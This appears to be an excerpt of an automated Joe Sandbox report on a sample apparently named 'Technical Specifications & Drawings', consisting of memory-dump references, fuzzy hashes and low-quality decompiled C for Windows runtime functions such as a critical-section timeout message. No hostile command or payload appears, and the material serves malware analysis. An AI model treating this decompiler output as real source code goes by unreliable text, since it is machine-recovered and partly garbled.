                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f02a82433ad255ac7fad8ade59c757eb1b2ec91718436b66453740553acc4a9
                                                  • Instruction ID: 109a97089f814d4d3592b038252ed5c1d5d0ca1b2dfd574779ceb9270f6a3e50
                                                  • Opcode Fuzzy Hash: 7f02a82433ad255ac7fad8ade59c757eb1b2ec91718436b66453740553acc4a9
                                                  • Instruction Fuzzy Hash: 8790027160900806D160719984147474005A7D4341F52C025A1014664DC7958A55B6E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ec29137d2475e4915047594fadbe5dd09dc6f3f4eb3a092c603962a6b66c058
                                                  • Instruction ID: e45c1a695ec0bac70bad72955d8e6e4815e2fd1bd885a15bb84eedc259f667c7
                                                  • Opcode Fuzzy Hash: 2ec29137d2475e4915047594fadbe5dd09dc6f3f4eb3a092c603962a6b66c058
                                                  • Instruction Fuzzy Hash: 4A90027120500846D11061998404B474005A7E4341F52C02AA1114664DC655C851B562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 9bacc32c77824155fe088a494a36a370fde0edd508d59a664882873545d2386c
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 26%
                                                  			E017D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				void* _v36;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				char _v60;
                                                  				char _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t48;
                                                  				intOrPtr _t49;
                                                  				intOrPtr _t50;
                                                  				intOrPtr* _t52;
                                                  				char _t56;
                                                  				void* _t69;
                                                  				char _t72;
                                                  				void* _t73;
                                                  				intOrPtr _t75;
                                                  				intOrPtr _t79;
                                                  				void* _t82;
                                                  				void* _t84;
                                                  				intOrPtr _t86;
                                                  				void* _t88;
                                                  				signed int _t90;
                                                  				signed int _t92;
                                                  				signed int _t93;
                                                  
                                                  				_t80 = __edx;
                                                  				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                  				_v8 =  *0x189d360 ^ _t92;
                                                  				_t72 = 0;
                                                  				_v72 = __edx;
                                                  				_t82 = __ecx;
                                                  				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                  				_v68 = _t86;
                                                  				E017EFA60( &_v60, 0, 0x30);
                                                  				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                  				_t93 = _t92 + 0xc;
                                                  				_v76 = _t48;
                                                  				_t49 = _t48;
                                                  				if(_t49 == 0) {
                                                  					_push(5);
                                                  					 *((char*)(_t82 + 0x6a)) = 0;
                                                  					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                  					goto L3;
                                                  				} else {
                                                  					_t69 = _t49 - 1;
                                                  					if(_t69 != 0) {
                                                  						if(_t69 == 1) {
                                                  							_push(0xa);
                                                  							goto L3;
                                                  						} else {
                                                  							_t56 = 0;
                                                  						}
                                                  					} else {
                                                  						_push(4);
                                                  						L3:
                                                  						_pop(_t50);
                                                  						_v80 = _t50;
                                                  						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                  							E017C2280(_t50, _t86 + 0x1c);
                                                  							_t79 = _v72;
                                                  							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                  							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                  							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                  							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                  							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                  							E017BFFB0(_t72, _t82, _t86 + 0x1c);
                                                  						}
                                                  						_t75 = _v80;
                                                  						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                  						_t80 =  *_t52;
                                                  						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                  						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                  						_v60 = 0x30;
                                                  						_v56 = _t75;
                                                  						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                  						asm("movsd");
                                                  						_v76 = _t80;
                                                  						_v64 = 0x30;
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						if(_t80 != 0) {
                                                  							 *0x189b1e0(_t75, _v72,  &_v64,  &_v60);
                                                  							_t72 = _v76();
                                                  						}
                                                  						_t56 = _t72;
                                                  					}
                                                  				}
                                                  				_pop(_t84);
                                                  				_pop(_t88);
                                                  				_pop(_t73);
                                                  				return E017EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                  			}



































                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 43fcfecfba3a9591e0065bcd84e1f46a6f121184b956e1348a2ac2efa7bab55a
                                                  • Instruction ID: e3e275673b4b4ca65380b493e2f4e33cf33de9a0c594eb95b0a1a0e074c7d39a
                                                  • Opcode Fuzzy Hash: 43fcfecfba3a9591e0065bcd84e1f46a6f121184b956e1348a2ac2efa7bab55a
                                                  • Instruction Fuzzy Hash: 984158B26087069FC311CF28C484A1ABBE5BB8D714F044A6EF989DB301D731EA45CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E0183FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                  				void* _t7;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t13;
                                                  				intOrPtr _t14;
                                                  				intOrPtr* _t15;
                                                  
                                                  				_t13 = __edx;
                                                  				_push(_a4);
                                                  				_t14 =  *[fs:0x18];
                                                  				_t15 = _t12;
                                                  				_t7 = E017ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                  				_push(_t13);
                                                  				E01835720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                  				_t9 =  *_t15;
                                                  				if(_t9 == 0xffffffff) {
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                  				}
                                                  				_push(_t10);
                                                  				_push(_t15);
                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                  				return E01835720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                  			}











                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183FDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0183FE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0183FE2B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 1639a97381e31f5cb0a36aa3fad93769609d3d91582d2dbf14104c442553076d
                                                  • Instruction ID: b6b9920870f858e195227ecc3a5a59b95b15711fe7171c4d39dcff66baf5396b
                                                  • Opcode Fuzzy Hash: 1639a97381e31f5cb0a36aa3fad93769609d3d91582d2dbf14104c442553076d
                                                  • Instruction Fuzzy Hash: 34F0FC725401017FEB211A49DC06F23BF9ADB84730F180314F724951E1D962F92086F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%